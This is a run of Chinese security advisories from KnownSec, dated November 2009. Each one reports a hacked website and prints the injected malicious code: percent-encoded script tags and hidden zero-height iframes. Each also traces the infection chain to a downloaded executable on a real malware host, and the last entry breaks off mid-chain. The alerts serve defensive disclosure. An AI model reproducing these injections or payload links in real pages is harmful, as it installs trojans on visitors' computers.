知道创宇

发布时间：Thu Nov 19 2009 18:42:44 UTC+0800
最后更新时间：Thu Nov 19 2009 18:42:44 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 西部互联（http://old.5tom.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://old.5tom.cn/

网页被嵌入恶意链接代码：
<script src=http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E></script><script src=http://%67%61%6E%67%61%6F%2E%6F%72%67%2E%63%6E></script><script src=http://%67%75%61%6E%6C%69%73%2E%63%6E></script><script src=http://%79%75%68%61%69%77%65%69%2E%63%6E></script><script src=http://%6D%61%6A%69%61%63%61%69%2E%63%6E></script><script src=http://%68%65%71%69%75%79%61%6E%2E%63%6E></script><script src=http://%79%75%6A%69%6E%73%68%61%6E%2E%63%6E></script><script src=http://%6A%69%61%79%69%66%61%6E%2E%63%6E></script><script src=http://%73%68%69%78%69%61%6F%78%69%61%2E%63%6E></script><script src=http://%65%63%72%69%6D%65%2E%63%6F%6D%2E%63%6E></script><script src=http://%6D%75%73%69%63%6D%6F%62%69%2E%63%6F%6D%2E%63%6E></script><script src=http://%74%68%65%73%74%6F%70%2E%63%6F%6D%2E%63%6E></script><script src=http://%73%70%6F%72%74%73%62%61%79%2E%63%6E></script><script src=http://%74%68%65%73%6F%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%73%70%6F%72%74%73%62%61%79%2E%63%6E></script><script src=http://%74%6F%6E%67%6C%76%65%2E%63%6E></script><script src=http://%69%67%67%6F%6F%6C%65%2E%63%6E></script><script src=http://%6B%75%6D%6F%67%72%6F%75%70%2E%63%6E></script><script src=http://%6E%65%69%6D%65%6E%67%6E%65%74%2E%63%6E></script><script src=http://%6A%61%6D%65%73%66%61%6E%73%2E%63%6E></script><script src=http://%77%75%78%69%66%64%63%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%382048%2E%63n></script><script src=http://%79o%75rs%70ac%65s%2Ecn></script><script src=http://chu%6E%72ang.c%6F%6D.cn></script><script src=http://%68%68%68%74%6Ci%76%65%2Ec%6E></script><script src=http://sha%72%65te%63hno%6C%6Fg%79.%63n></script><script src=http://avstee%6C.cn></script><script src=http://%73of%74%77are%73y%73t%65%6D%73%2Ec%6E></script><script src=http://ti%61%6Ej%69%6Ecn.%63%6E></script><script src=http://%74lfh%6F%75s%65.%63%6E></script><script src=http://%73to%6E%65b%2Ecn></script><script src=http://s%70ortsinde%78%2Ecn></script><script src=http://a%6C%74%7A%78%2E%63%6E></script><script src=http://%62%79%6Erol%2E%63%6E></script><script src=http://%62ynr%74%76.c%6E></script><script src=http://c%69t%79s%62b%73%2E%63%6E></script><script src=http://%63%6En%65%69%6D%65%6E%67%67%75.%63n></script>

挂马分析：
[root]http://old.5tom.cn/
    [script]http://yuhaiwei.cn
        [iframe]http://8pio.8866.org/dszq/2.htm
            [iframe]http://709ff.cn/x2/xx.html
                [iframe]http://709ff.cn/x2/yt.htm
                    [script]http://709ff.cn/x2/ll.jpg
                    [script]http://709ff.cn/x2/ll1.jpg
                    [script]http://709ff.cn/x2/lll.jpg
                        [exe]http://d.khtgf.cn/xx/x2.css
                    [script]http://709ff.cn/x2/llll1.jpg
                    [script]http://709ff.cn/x2/llll.jpg
                    [script]http://709ff.cn/x2/lllll.jpg
                [iframe]http://709ff.cn/x2/ytu.htm
                    [iframe]http://709ff.cn/x2/of.htm
                        [script]http://709ff.cn/x2/lll.jpg
                        [script]http://709ff.cn/x2/of.jpg
                [iframe]http://709ff.cn/x2/t9.htm
                    [script]http://709ff.cn/x2/lll.jpg
                [iframe]http://709ff.cn/x2/yut.htm
                    [iframe]http://709ff.cn/x2/ytfl1.htm
                        [iframe]http://709ff.cn/x2/x1.htm
                            [script]http://709ff.cn/x2/swfobject.js
                            [flash]http://709ff.cn/x2/./x1.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x3.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x4.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x2.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                        [iframe]http://709ff.cn/x2/x2.htm
                            [script]http://709ff.cn/x2/swfobject.js
                            [flash]http://709ff.cn/x2/./x7.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x9.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x10.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x8.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                        [iframe]http://709ff.cn/x2/x1.htm
最终下载病毒文件：
http://d.khtgf.cn/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：51
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Wed Nov 18 2009 20:16:08 UTC+0800
最后更新时间：Wed Nov 18 2009 20:16:08 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 海淀公共安全馆（http://safechina.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://safechina.cn/

网页被嵌入恶意链接代码：
挂马分析：
[root]http://safechina.cn/
    [script]http://ff1114.2288.org
        [iframe]http://ft1113.3322.org/jj/4.htm
            [iframe]http://109ee.cn/x15/xx.html
                [iframe]http://109ee.cn/x15/yt.htm
                    [script]http://109ee.cn/x15/ll.jpg
                    [script]http://109ee.cn/x15/ll1.jpg
                    [script]http://109ee.cn/x15/lll.jpg
                        [exe]http://d.khtgf.cn/xx/x15.css
                    [script]http://109ee.cn/x15/llll1.jpg
                    [script]http://109ee.cn/x15/llll.jpg
                    [script]http://109ee.cn/x15/lllll.jpg
                [iframe]http://109ee.cn/x15/t9.htm
                    [script]http://109ee.cn/x15/lll.jpg
                [iframe]http://109ee.cn/x15/yut.htm
                    [iframe]http://109ee.cn/x15/ytfl1.htm
                        [iframe]http://109ee.cn/x15/x1.htm
                            [script]http://109ee.cn/x15/swfobject.js
                            [flash]http://109ee.cn/x15/./x1.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                            [flash]http://109ee.cn/x15/./x3.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                            [flash]http://109ee.cn/x15/./x4.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                            [flash]http://109ee.cn/x15/./x2.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                        [iframe]http://109ee.cn/x15/x2.htm
                            [script]http://109ee.cn/x15/swfobject.js
                            [flash]http://109ee.cn/x15/./x7.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                            [flash]http://109ee.cn/x15/./x9.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                            [flash]http://109ee.cn/x15/./x10.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                            [flash]http://109ee.cn/x15/./x8.swf
                                [exe]http://d.khtgf.cn/xx/x15.css
                        [iframe]http://109ee.cn/x15/x1.htm
                [iframe]http://109ee.cn/x15/ytu.htm
                    [iframe]http://109ee.cn/x15/of.htm
                        [script]http://109ee.cn/x15/lll.jpg
                        [script]http://109ee.cn/x15/of.jpg
    [iframe]http://safechina.cn/gundong.htm
        [script]http://ff1114.2288.org
    [script]http://ff1114.2288.org
最终下载病毒文件：
http://d.khtgf.cn/xx/x15.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：2
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发布时间：Tue Nov 17 2009 17:56:22 UTC+0800
最后更新时间：Tue Nov 17 2009 17:56:22 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 北京律师网（http://www.bjlsw.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bjlsw.cn/

网页被嵌入恶意链接代码：
<script language=javascript src=http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad></script>

挂马分析：
[root]http://www.bjlsw.cn/
    [script]http://neb.xorg.pl/c.js?google_ad=11×109_ad
        [iframe]http://gkl.nna.cc/77/2360sd.htm
            [iframe]http://gkl.nna.cc/77/avp.htm
                [iframe]http://gkl.nna.cc/77/mpie.htm
                    [script]http://gkl.nna.cc/77/ll.jpg
                    [script]http://gkl.nna.cc/77/ll1.jpg
                    [script]http://gkl.nna.cc/77/lll.jpg
                        [exe]http://gkl.nna.cc/f/bb.exe
                    [script]http://gkl.nna.cc/77/llll1.jpg
                    [script]http://gkl.nna.cc/77/llll.jpg
                    [script]http://gkl.nna.cc/77/lllll.jpg
                [iframe]http://gkl.nna.cc/77/ofic.htm
                    [script]http://gkl.nna.cc/77/ofic.swf
                        [exe]http://gkl.nna.cc/f/bb.exe
                [iframe]http://gkl.nna.cc/77/nod.htm
                    [iframe]http://gkl.nna.cc/77/ofnt.htm
                        [script]http://gkl.nna.cc/77/ofnt.swf
                            [exe]http://gkl.nna.cc/f/bb.exe
                    [iframe]http://gkl.nna.cc/77/glz.htm
                        [script]http://gkl.nna.cc/77/glz.swf
                        [script]http://gkl.nna.cc/77/glzz.swf
                            [exe]http://gkl.nna.cc/f/bb.exe
                [iframe]http://gkl.nna.cc/77/real.htm
                    [iframe]http://gkl.nna.cc/77/myra.htm
                        [script]http://gkl.nna.cc/77/myra.swf
                            [exe]http://gkl.nna.cc/f/bb.exe
                    [iframe]http://gkl.nna.cc/77/myrax.htm
                        [script]http://gkl.nna.cc/77/myrax.swf
                            [exe]http://gkl.nna.cc/f/bb.exe
            [script]http://gkl.nna.cc/77/fa.js
                [iframe]http://gkl.nna.cc/77/fa.htm
                    [iframe]http://gkl.nna.cc/77/ff.html
                    [iframe]http://gkl.nna.cc/77/ie.html
                    [iframe]http://gkl.nna.cc/77/ff.html
                    [iframe]http://gkl.nna.cc/77/ie.html
                    [iframe]http://gkl.nna.cc/77/ff.html
                    [iframe]http://gkl.nna.cc/77/ff.html
    [script]http://neb.xorg.pl/c.js?google_ad=11×109_ad
最终下载病毒文件：
http://gkl.nna.cc/f/bb.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Mon Nov 16 2009 20:49:47 UTC+0800
最后更新时间：Mon Nov 16 2009 20:49:47 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 51much网站流量统计（http://count1.51much.com/cnt.php）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://count1.51much.com/cnt.php

网页被嵌入恶意链接代码：
document.write (’<script src=http://www.10105858.com/css/v31.js></script>’);

挂马分析：
[root]http://count1.51much.com/cnt.php
    [script]http://www.10105858.com/css/v31.js
        [iframe]http://www.10105858.com/manage/s1.htm
            [iframe]http://vava31.9966.org/kuaile456/8.htm
                [iframe]http://673bb.cn/x123/xx.html
                    [iframe]http://673bb.cn/x123/yt.htm
                        [script]http://673bb.cn/x123/ll.jpg
                        [script]http://673bb.cn/x123/ll1.jpg
                        [script]http://673bb.cn/x123/lll.jpg
                            [exe]http://d.khtgf.cn/xx/x123.css
                        [script]http://673bb.cn/x123/llll1.jpg
                        [script]http://673bb.cn/x123/llll.jpg
                        [script]http://673bb.cn/x123/lllll.jpg
                    [iframe]http://673bb.cn/x123/t9.htm
                        [script]http://673bb.cn/x123/lll.jpg
                        [script]http://673bb.cn/x123/t9.jpg
                    [iframe]http://673bb.cn/x123/yut.htm
                        [iframe]http://673bb.cn/x123/ytfl1.htm
                            [iframe]http://673bb.cn/x123/x1.htm
                                [script]http://673bb.cn/x123/swfobject.js
                                [flash]http://673bb.cn/x123/./x1.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                                [flash]http://673bb.cn/x123/./x3.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                                [flash]http://673bb.cn/x123/./x4.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                                [flash]http://673bb.cn/x123/./x2.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                            [iframe]http://673bb.cn/x123/x2.htm
                                [script]http://673bb.cn/x123/swfobject.js
                                [flash]http://673bb.cn/x123/./x7.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                                [flash]http://673bb.cn/x123/./x9.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                                [flash]http://673bb.cn/x123/./x10.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                                [flash]http://673bb.cn/x123/./x8.swf
                                    [exe]http://d.khtgf.cn/xx/x123.css
                            [iframe]http://673bb.cn/x123/x1.htm
                    [iframe]http://673bb.cn/x123/ytu.htm
                        [iframe]http://673bb.cn/x123/of.htm
                            [script]http://673bb.cn/x123/lll.jpg
                            [script]http://673bb.cn/x123/of.jpg
        [iframe]http://www.10105858.com/manage/s2.htm
            [iframe]http://abcd3.oicp.net/01/01.htm?3
    [script]http://
最终下载病毒文件：
http://d.khtgf.cn/xx/x123.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：51
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Sat Nov 14 2009 18:53:28 UTC+0800
最后更新时间：Sat Nov 14 2009 18:53:28 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国海峡两岸教育论坛网（http://www.hxedu365.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hxedu365.cn/

网页被嵌入恶意链接代码：
<script language=javascript src=http://ne%6A.xo%72g.%70l/c.js?google_ad=11×312_ad></script>

挂马分析：
[root]http://www.hxedu365.cn/
    [script]http://nej.xorg.pl/c.js?google_ad=11×312_ad
        [iframe]http://ggv.nna.cc/11/360sd.htm
            [iframe]http://ggv.nna.cc/11/at.htm
                [iframe]http://ggv.nna.cc/11/mpie.htm
                    [script]http://ggv.nna.cc/11/ll.jpg
                    [script]http://ggv.nna.cc/11/ll1.jpg
                    [script]http://ggv.nna.cc/11/lll.jpg
                        [exe]http://ggv.nna.cc/h/bb.exe
                    [script]http://ggv.nna.cc/11/llll1.jpg
                    [script]http://ggv.nna.cc/11/llll.jpg
                    [script]http://ggv.nna.cc/11/lllll.jpg
                [iframe]http://ggv.nna.cc/11/ofic.htm
                    [script]http://ggv.nna.cc/11/ofic.swf
                        [exe]http://ggv.nna.cc/h/bb.exe
                [iframe]http://ggv.nna.cc/11/al.htm
                    [iframe]http://ggv.nna.cc/11/ofnt.htm
                        [script]http://ggv.nna.cc/11/ofnt.swf
                            [exe]http://ggv.nna.cc/h/bb.exe
                    [iframe]http://ggv.nna.cc/11/glz.htm
                        [script]http://ggv.nna.cc/11/glz.swf
                        [script]http://ggv.nna.cc/11/glzz.swf
                            [exe]http://ggv.nna.cc/h/bb.exe
                [iframe]http://ggv.nna.cc/11/ar.htm
                    [iframe]http://ggv.nna.cc/11/myra.htm
                        [script]http://ggv.nna.cc/11/myra.swf
                            [exe]http://ggv.nna.cc/h/bb.exe
                    [iframe]http://ggv.nna.cc/11/myrax.htm
                        [script]http://ggv.nna.cc/11/myrax.swf
                            [exe]http://ggv.nna.cc/h/bb.exe
            [script]http://ggv.nna.cc/11/fa.js
                [iframe]http://ggv.nna.cc/11/fa.htm
                    [iframe]http://ggv.nna.cc/11/ff.html
                    [iframe]http://ggv.nna.cc/11/ie.html
                    [iframe]http://ggv.nna.cc/11/ff.html
                    [iframe]http://ggv.nna.cc/11/ie.html
                    [iframe]http://ggv.nna.cc/11/ff.html
                    [iframe]http://ggv.nna.cc/11/ff.html
最终下载病毒文件：
http://ggv.nna.cc/h/bb.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：12
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Thu Nov 12 2009 19:39:22 UTC+0800
最后更新时间：Thu Nov 12 2009 19:39:22 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国维修网（http://www.weixiuwang.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.weixiuwang.com/

网页被嵌入恶意链接代码：
<script language=javascript src=http://vh%64.xor%67.%70l/c.js?google_ad=130×31_ad></script><script language=javascript src=http://vh%6A.xo%72g.%70l/c.js?google_ad=11×33_ad></script><script language=javascript src=http://360%62a.km%64dns.c%6Fm/c.js?google_ad=11×03_ad></script><script language=javascript src=http://n%63w.s%6Fv.%74w/c.js?google_ad=12×04_ad></script><script language=javascript src=http://vh%6B.xor%67.%70l/c.js?google_ad=11×07_ad></script><script language=javascript src=http://ne%63.xo%72g.%70l/c.js?google_ad=11×110_ad></script><script language=javascript src=http://ne%64.xo%72g.%70l/c.js?google_ad=11×210_ad></script><script language=javascript src=http://ne%66.xo%72g.%70l/c.js?google_ad=11×111_ad></script><script language=javascript src=http://ne%68.xo%72g.%70l/c.js?google_ad=11×112_ad></script>

挂马分析：
[root]http://www.weixiuwang.com/
    [iframe]http://www.weixiuwang.com/dy_download.asp
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [iframe]http://www.weixiuwang.com/dy_other.asp?urltype=1
    [iframe]http://www.weixiuwang.com/dy_other.asp?urltype=2
    [iframe]http://www.weixiuwang.com/dy_other.asp?urltype=3
    [script]http://searchbar.mainone.com/searchbar/search4.js
        [script]http://searchbar.mainone.com/searchbar/mainonefunction.js
        [iframe]http://union.b2b.cn/allymember/isusesearchbar.aspx?url=
        [exe]http://searchbar.mainone.com/searchbar/css.css
    [script]http://club.weixiuwang.com/dv_news.asp?getname=hottopic
        [script]http://vhj.xorg.pl/c.js?google_ad=11×33_ad
        [script]http://vhj.xorg.pl/c.js?google_ad=11×33_ad
        [script]http://360ba.kmddns.com/c.js?google_ad=11×03_ad
        [script]http://vhk.xorg.pl/c.js?google_ad=11×07_ad
        [script]http://nec.xorg.pl/c.js?google_ad=11×110_ad
        [script]http://ned.xorg.pl/c.js?google_ad=11×210_ad
        [script]http://nef.xorg.pl/c.js?google_ad=11×111_ad
        [script]http://neh.xorg.pl/c.js?google_ad=11×112_ad
        [script]http://photo.gog.com.cn/html/js/fs.js
        [script]http://photo.gog.com.cn/html/js/fs.js
    [script]http://vsh.xorg.pl/c.js?google_ad=1029×29_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
            [iframe]http://goi.nna.cc/66/at.htm
                [iframe]http://goi.nna.cc/66/mpie.htm
                    [script]http://goi.nna.cc/66/ll.jpg
                    [script]http://goi.nna.cc/66/ll1.jpg
                    [script]http://goi.nna.cc/66/lll.jpg
                        [exe]http://goi.nna.cc/h/av.exe
                    [script]http://goi.nna.cc/66/llll1.jpg
                    [script]http://goi.nna.cc/66/llll.jpg
                    [script]http://goi.nna.cc/66/lllll.jpg
                [iframe]http://goi.nna.cc/66/ofic.htm
                    [script]http://goi.nna.cc/66/ofic.swf
                        [exe]http://goi.nna.cc/h/av.exe
                [iframe]http://goi.nna.cc/66/al.htm
                    [iframe]http://goi.nna.cc/66/ofnt.htm
                        [script]http://goi.nna.cc/66/ofnt.swf
                            [exe]http://goi.nna.cc/h/av.exe
                    [iframe]http://goi.nna.cc/66/glz.htm
                        [script]http://goi.nna.cc/66/glz.swf
                        [script]http://goi.nna.cc/66/glzz.swf
                            [exe]http://goi.nna.cc/h/av.exe
            [script]http://goi.nna.cc/66/fa.js
                [iframe]http://goi.nna.cc/66/fa.htm
                    [iframe]http://goi.nna.cc/66/ff.html
                    [iframe]http://goi.nna.cc/66/ie.html
                    [iframe]http://goi.nna.cc/66/ff.html
                    [iframe]http://goi.nna.cc/66/ie.html
                    [iframe]http://goi.nna.cc/66/ff.html
                    [iframe]http://goi.nna.cc/66/ff.html
    [script]http://float2006.tq.cn/floatcard?

adminid=8154067&sort=0&where=
        [script]http://sysimages.tq.cn/js/tqhead.js
        [script]http://sysimages.tq.cn/js/tqdragandcommon.js
        [script]http://sysimages.tq.cn/js/tqfloatwin_agent.js
        [script]http://sysimages.tq.cn/js/tqxunwen_agent.js
    [script]http://vhd.xorg.pl/c.js?google_ad=130×31_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://vhj.xorg.pl/c.js?google_ad=11×33_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://360ba.kmddns.com/c.js?google_ad=11×03_ad
    [script]http://ncw.sov.tw/c.js?google_ad=12×04_ad
    [script]http://vhk.xorg.pl/c.js?google_ad=11×07_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://nec.xorg.pl/c.js?google_ad=11×110_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://ned.xorg.pl/c.js?google_ad=11×210_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://nef.xorg.pl/c.js?google_ad=11×111_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://neh.xorg.pl/c.js?google_ad=11×112_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
最终下载病毒文件：
http://goi.nna.cc/h/av.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：10
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Wed Nov 11 2009 20:39:05 UTC+0800
最后更新时间：Wed Nov 11 2009 20:39:05 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 北京林业大学心理系（http://psychina.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://psychina.cn/

网页被嵌入恶意链接代码：
<script src=http://m%6F%62%69%68%6F%6Des.c%6E></script><script language=javascript src=http://d%62q.xo%72g.%70l/c.js?google_ad=1023×25_ad></script><script src=http://si%6E%67a%70o%72e%62%62%73.%63n></script><script src=http://3%369%74m%7A%2Ecn></script><script src=http://%6Ci%61o%6Ei%6Egh%6F%75%73%65.%63%6E></script><script src=http://3%369%74m%7A%2Ecn></script><script src=http://%6Ci%61o%6Ei%6Egh%6F%75%73%65.%63%6E></script>

挂马分析：
[root]http://psychina.cn/
    [script]http://m%6f%62%69%68%6f%6des.c%6e
    [script]http://d%62q.xo%72g.%70l/c.js?google_ad=1023×25_ad
  [iframe]http://gfn.nna.cc/55/360sd.htm
   [iframe]http://gfn.nna.cc/55/at.htm
    [iframe]http://gfn.nna.cc/55/mpie.htm
    [iframe]http://gfn.nna.cc/55/ofic.htm
    [iframe]http://gfn.nna.cc/55/al.htm
     [iframe]http://gfn.nna.cc/55/ofnt.htm
      [script]http://gfn.nna.cc/55/ofnt.swf
       [exe]http://gfn.nna.cc/j/av.exe
     [iframe]http://gfn.nna.cc/55/glz.htm
    [iframe]http://gfn.nna.cc/55/ar.htm
   [script]http://gfn.nna.cc/55/fa.js
    [script]http://si%6e%67a%70o%72e%62%62%73.%63n
    [script]http://3%369%74m%7a%2ecn
    [script]http://%6ci%61o%6ei%6egh%6f%75%73%65.%63%6e
    [script]http://3%369%74m%7a%2ecn
    [script]http://%6ci%61o%6ei%6egh%6f%75%73%65.%63%6e

最终下载病毒文件：
http://gfn.nna.cc/j/av.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：19
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Tue Nov 10 2009 16:59:14 UTC+0800
最后更新时间：Tue Nov 10 2009 16:59:14 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国电能质量网（http://www.china95598.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.china95598.com/

网页被嵌入恶意链接代码：
<iframe src= http://www.d2lifeonline.com:81/admin_gua_c.htm width=100 height=0></iframe>

挂马分析：
[root]http://www.china95598.com/
    [iframe]http://www.d2lifeonline.com:81/admin_gua_c.htm
        [iframe]http://www.d2lifeonline.com:81/mpeg/xys0922.html
            [exe]http://www.d2lifeonline.com:81/zhl/update.exe                                                                                  !http://127.0.0.1/1.exe
        [iframe]http://www.d2lifeonline.com:81/offi.html
            [exe]http://www.d2lifeonline.com:81/zhl/update.exe                                                                                  !http://127.0.0.1/1.exe
最终下载病毒文件：
http://www.d2lifeonline.com:81/zhl/update.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Mon Nov 9 2009 23:50:24 UTC+0800
最后更新时间：Mon Nov 9 2009 23:50:24 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 远景网（http://www.pcbeta.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.pcbeta.com/

网页被嵌入恶意链接代码：
<iframe src=http://cnzz20.8800.org/aa/b107.htm width=100 height=0></iframe>

挂马分析：
[root]http://www.pcbeta.com/
    [iframe]http://cnzz02.8866.org/aa/b107.htm
